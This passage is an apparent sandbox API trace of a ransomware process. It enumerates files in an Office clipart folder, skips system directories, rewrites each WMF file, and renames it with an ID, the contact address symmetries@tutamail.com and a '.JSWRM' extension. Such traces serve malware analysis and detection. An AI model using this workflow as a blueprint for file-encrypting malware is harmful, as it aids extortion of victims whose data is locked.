lstrcmpiW (lpString1="SL00286_.WMF", lpString2="..") returned 1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="...") returned 1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="windows") returned -1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="recovery") returned 1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="perflogs") returned 1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="documents and settings") returned 1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.393] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="system volume information") returned -1 [0095.394] lstrcmpiW (lpString1="SL00286_.WMF", lpString2="msocache") returned 1 [0095.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0095.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00286_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00286_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00286_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0095.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00286_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00286_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00286_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0095.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00286_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.394] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7596) returned 1 [0095.394] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1da0) returned 0x205850 [0095.395] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1da0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1da0, lpOverlapped=0x0) returned 1 [0095.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.397] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1da0, lpOverlapped=0x0) returned 1 [0095.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.397] CloseHandle (hObject=0x314) returned 1 [0095.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0095.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0095.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0095.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0095.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0095.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00286_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00286_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0095.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.398] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1268, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00298_.WMF", cAlternateFileName="")) returned 1 [0095.398] lstrcmpiW (lpString1="SL00298_.WMF", lpString2=".") returned 1 [0095.398] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="..") returned 1 [0095.398] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="...") returned 1 [0095.398] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="windows") returned -1 [0095.398] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="recovery") returned 1 [0095.398] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="perflogs") returned 1 [0095.399] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="documents and settings") returned 1 [0095.399] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.399] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="system volume information") returned -1 [0095.399] lstrcmpiW (lpString1="SL00298_.WMF", lpString2="msocache") returned 1 [0095.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00298_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00298_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00298_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00298_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00298_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00298_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0095.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00298_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.399] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4712) returned 1 [0095.399] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1260) returned 0x205850 [0095.400] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1260, lpOverlapped=0x0) returned 1 [0095.402] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.402] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1260, lpOverlapped=0x0) returned 1 [0095.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.402] CloseHandle (hObject=0x314) returned 1 [0095.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0095.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0095.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0095.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0095.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0095.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0095.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.402] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00298_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00298_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0095.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0095.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.403] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00308_.WMF", cAlternateFileName="")) returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2=".") returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="..") returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="...") returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="windows") returned -1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="recovery") returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="perflogs") returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="documents and settings") returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="system volume information") returned -1 [0095.403] lstrcmpiW (lpString1="SL00308_.WMF", lpString2="msocache") returned 1 [0095.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00308_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00308_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00308_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0095.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00308_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00308_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00308_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0095.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00308_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.404] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8416) returned 1 [0095.404] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20e0) returned 0x205850 [0095.404] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x20e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x20e0, lpOverlapped=0x0) returned 1 [0095.406] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.406] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x20e0, lpOverlapped=0x0) returned 1 [0095.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.406] CloseHandle (hObject=0x314) returned 1 [0095.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0095.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0095.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0095.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0095.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0095.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00308_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00308_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0095.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.408] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00345_.WMF", cAlternateFileName="")) returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2=".") returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="..") returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="...") returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="windows") returned -1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="recovery") returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="perflogs") returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="documents and settings") returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="system volume information") returned -1 [0095.408] lstrcmpiW (lpString1="SL00345_.WMF", lpString2="msocache") returned 1 [0095.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0095.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00345_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00345_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00345_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0095.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00345_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00345_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00345_.WMF", lpUsedDefaultChar=0x0) returned 12 